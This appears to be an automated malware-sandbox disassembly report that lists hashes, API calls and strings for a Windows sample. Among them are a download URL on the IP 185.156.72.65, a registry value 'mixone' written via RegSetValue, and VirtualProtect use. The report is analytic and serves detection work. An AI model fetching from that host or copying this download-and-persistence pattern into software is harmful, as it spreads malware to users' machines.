                    • Instruction ID: ca795268159c21d128c013142cdfc2d9b79cbc1da2bbaf958516ecc3655a5718
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: 39113DBB24014243D614873DD9F49B7A395EBC5320B2D437BD1416B7D4D33AE9459A8C
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction ID: 31093a781ad63aed303cabcd308a4e0756b12fe3fa5f3aaf202d1ed763eb6600
                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                    • Instruction Fuzzy Hash: D91127B720018247D655CA3ED4B42B6E79DEFC6329B3C477AD8858B77AD222B144D700
                    Memory Dump Source
                    • Source File: 00000000.00000002.4100040646.0000000000603000.00000040.00000001.01000000.00000003.sdmp, Offset: 00603000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_603000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1e30c0d5435bd2ebdc3ca0cbaf8467a403c747bbf48d72ae2cddbf857c5e0048
                    • Instruction ID: acc1b72413786fd9169f0ea31a990889d17b8f776d8ca64ff04e059f412f7394
                    • Opcode Fuzzy Hash: 1e30c0d5435bd2ebdc3ca0cbaf8467a403c747bbf48d72ae2cddbf857c5e0048
                    • Instruction Fuzzy Hash: 74114CB150D602DFE359BF29C89523AB7E6EB94310F628A2D92C6C7254EE304443DB96
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101686121.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 047A0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_47a0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction ID: 08771eb7056d114c5da39982fe0a0733143f4f69ed40c61d8a9fd9b91280a921
                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                    • Instruction Fuzzy Hash: 8C1182723401009FD754DF65DC90FA673EAEBC9220B198156ED04CB315E675FC11C760
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction ID: cacfbc0c46e98c86a351d82b4132ac5c712cceccaeed7baca1d735253631f30a
                    • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                    • Instruction Fuzzy Hash: 3401A276A006049FDF21CF24C818BAA33E9EB86316F6544B5ED0A9B291E774B9458F90
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,00409BBB), ref: 00409BE9
                    • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00409BBB), ref: 00409BF4
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00409BBB), ref: 00409C05
                    • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00409C17
                    • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00409C25
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00409BBB), ref: 00409C48
                    • DeleteCriticalSection.KERNEL32(0042D064,00000007,?,?,00409BBB), ref: 00409C64
                    • CloseHandle.KERNEL32(00000000,?,?,00409BBB), ref: 00409C74
                    Strings
                    • SleepConditionVariableCS, xrefs: 00409C11
                    • kernel32.dll, xrefs: 00409C00
                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00409BEF
                    • WakeAllConditionVariable, xrefs: 00409C1D
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                    • API String ID: 2565136772-3242537097
                    • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction ID: 8f8b07cbf63392261d8dc325579aef03bb655b7cde116df0e27078c5153b7531
                    • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction Fuzzy Hash: 6F015271F48711ABE7205BB4BD09F562BD8AB49705B554032BA05E22A2DB78CC068A6C
                    APIs
                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0041CECF), ref: 0041C3E8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                    • Instruction ID: a42e5d16fde1fbafe1f90c690df07fce043cce1a805407c3827f836c313506d5
                    • Opcode Fuzzy Hash: 15d817c9b1d0a4fbb0458c9f351412a41f7c6c9a49760990de8b925fd3443d3a
                    • Instruction Fuzzy Hash: 2D51AD7198022AEBCB108F58EE8C1FE7F72FB44304F908057D481A6654C7BC99A6CB9D
                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 0040BE1A
                    • ___TypeMatch.LIBVCRUNTIME ref: 0040BF28
                    • _UnwindNestedFrames.LIBCMT ref: 0040C07A
                    • CallUnexpected.LIBVCRUNTIME ref: 0040C095
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 2751267872-393685449
                    • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction ID: 33f924a654f9d1b13218269df17d2698b0e91053480f28ff55db22427738ff3f
                    • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction Fuzzy Hash: 38B1767180020AEFCF24DFA5C9819AEB7B5EF04314B14426BE9057B292D739EA51CFD9
                    APIs
                    • type_info::operator==.LIBVCRUNTIME ref: 0495C081
                    • ___TypeMatch.LIBVCRUNTIME ref: 0495C18F
                    • _UnwindNestedFrames.LIBCMT ref: 0495C2E1
                    • CallUnexpected.LIBVCRUNTIME ref: 0495C2FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                    • String ID: csm$csm$csm
                    • API String ID: 2751267872-393685449
                    • Opcode ID: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction ID: 49a077c02193fad4963031e610288ab3dde81cabf894039e6f2048b220070edb
                    • Opcode Fuzzy Hash: d9d1dd97a28ed08d243fefd6e212ea817b405283f267b0edc229452d693e4b60
                    • Instruction Fuzzy Hash: 9DB11671800309AFDF29DFA4D8809AEBBB9BF44314F24456AEC156B221D771FA91CB91
                    APIs
                    • RegCreateKeyExA.ADVAPI32(80000001,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00405923
                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020006,?), ref: 00405945
                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?), ref: 0040596D
                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405976
                    • Sleep.KERNEL32(000003E8), ref: 00405AB0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateOpenSleepValue
                    • String ID: 185.156.72.65$185.156.72.65$mixone
                    • API String ID: 4111408922-485810328
                    • Opcode ID: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                    • Instruction ID: d5f4d92326b12601678bd67615438d10f3376d08b80102dff59a3baec9f40a0a
                    • Opcode Fuzzy Hash: 76a0eb9b053f2720e41b6ddde5d1263b2dfbe59c6a58b35459c5c5341c7fd760
                    • Instruction Fuzzy Hash: 14419271210108AFEB08CF64DC95BEE7B65EF49300F90822DF916A66D2D778E9848F58
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0042D064,00000FA0,?,?,04959E22), ref: 04959E50
                    • GetModuleHandleW.KERNEL32(0041FFC8,?,?,04959E22), ref: 04959E5B
                    • GetModuleHandleW.KERNEL32(0042000C,?,?,04959E22), ref: 04959E6C
                    • GetProcAddress.KERNEL32(00000000,00420028), ref: 04959E7E
                    • GetProcAddress.KERNEL32(00000000,00420044), ref: 04959E8C
                    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,04959E22), ref: 04959EAF
                    • RtlDeleteCriticalSection.NTDLL(0042D064), ref: 04959ECB
                    • CloseHandle.KERNEL32(0042D060,?,?,04959E22), ref: 04959EDB
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                    • String ID:
                    • API String ID: 2565136772-0
                    • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction ID: f95af81ad5315ca355b259ccfb780d6e2e4be1318cf8d3b911b16a674888c97b
                    • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                    • Instruction Fuzzy Hash: C0015271F40711EBE7209BB4BC0DB9B3AECAB48705B604135BD05E2171DB78D80B8B68
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                    • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                    • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                    • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: _strrchr
                    • String ID:
                    • API String ID: 3213747228-0
                    • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                    • Instruction ID: 79f55e3a299b863bd512580f25b7e7a2d94f51e119f061a2853a0a3e81ce9c19
                    • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                    • Instruction Fuzzy Hash: BCB16B32A00365AFEB11CF98CC81FAE7BA9EF95314F154175E906AF281D274B901CBA5
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                      • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                    • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: 185.156.72.65$string too long
                    • API String ID: 2123813255-2459586365
                    • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                    • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                    • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                    • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 0040B837
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                    • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                    • _ValidateLocalCookies.LIBCMT ref: 0040B948
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                    • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                    • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                    APIs
                    • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeLibrary
                    • String ID: api-ms-$ext-ms-
                    • API String ID: 3664257935-537541572
                    • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                    • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                    • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                    APIs
                    • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                    • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                    • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                    APIs
                    • GetLastError.KERNEL32(?,?,0495BC22,0495B1C6,0495A9D7), ref: 0495BC39
                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0495BC47
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0495BC60
                    • SetLastError.KERNEL32(00000000,0495BC22,0495B1C6,0495A9D7), ref: 0495BCB2
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLastValue___vcrt_
                    • String ID:
                    • API String ID: 3852720340-0
                    • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction ID: fa83bc30c76dc1b346922600d2384d1d63f280bec9cd6f43eb71c9ca7c8fbf1c
                    • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                    • Instruction Fuzzy Hash: 1901B5322097119EB735ABBCFCC5A5B2A68EB4167C3704239ED24950F1EF5178055348
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 0495186C
                      • Part of subcall function 04959AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04959AF5
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518A2
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049518D9
                    • Concurrency::cancel_current_task.LIBCPMT ref: 049519EE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                    • String ID: 185.156.72.65
                    • API String ID: 2123813255-1765470537
                    • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                    • Instruction ID: a7ed5558de41f27cae143ab3c72e322dddedd3e6f85bbaf2a4dca6a38d894550
                    • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                    • Instruction Fuzzy Hash: 1941D7B1E00301EBE724DF64AC86B5AB6F8EF44214F300639ED5AD72A0E771B944C7A1
                    APIs
                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,73BDA22C,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                    • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressFreeHandleLibraryModuleProc
                    • String ID: CorExitProcess$mscoree.dll
                    • API String ID: 4061214504-1276376045
                    • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                    • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                    • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                    • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                    APIs
                    • __alloca_probe_16.LIBCMT ref: 004150D5
                    • __alloca_probe_16.LIBCMT ref: 0041519E
                    • __freea.LIBCMT ref: 00415205
                      • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                    • __freea.LIBCMT ref: 00415218
                    • __freea.LIBCMT ref: 00415225
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                    • String ID:
                    • API String ID: 1423051803-0
                    • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                    • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                    • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                    • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 04952D5F
                    • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04952D74
                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04952D82
                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04952D9D
                    • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04952DBC
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                    • String ID:
                    • API String ID: 2509773233-0
                    • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                    • Instruction ID: ad75ccc773eceebc192db8fb39c2314cbaead7f3e8e0fd29d23a60f79af1df4f
                    • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                    • Instruction Fuzzy Hash: 9131E532B00104AFEB14DF58DC40FAAB7B8EF48700F6541F9ED059B2A2DB31A916CB94
                    APIs
                      • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                      • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                    • __Init_thread_footer.LIBCMT ref: 004013BB
                      • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                      • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                      • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                    • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                    • API String ID: 2296764815-3011832937
                    • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                    • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                    • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                    • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                    APIs
                      • Part of subcall function 04959F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959F37
                      • Part of subcall function 04959F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F74
                    • __Init_thread_footer.LIBCMT ref: 04951622
                      • Part of subcall function 04959EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04959EEC
                      • Part of subcall function 04959EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04959F1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4101764872.0000000004950000.00000040.00001000.00020000.00000000.sdmp, Offset: 04950000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CriticalSection$EnterLeave$Init_thread_footer
                    • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                    • API String ID: 4132704954-3011832937
                    • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                    • Instruction ID: f2a4a027ef8a0ee0b3476cacc3b775bdd46468fee5a2291894e2f4cb192b192f
                    • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                    • Instruction Fuzzy Hash: 2F2146B0F00244DAE730DF29E8467A9B3A0FB55308FB48279DC455B271DBB52986CB09
                    APIs
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                    • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.4099946963.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad$ErrorLast
                    • String ID: api-ms-
                    • API String ID: 3177248105-2084034818
                    • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                    • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                    • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                    • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                    APIs
                    • GetConsoleOutputCP.KERNEL32(73BDA22C,00000000,00000000,00000000), ref: 0041972F
                      • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
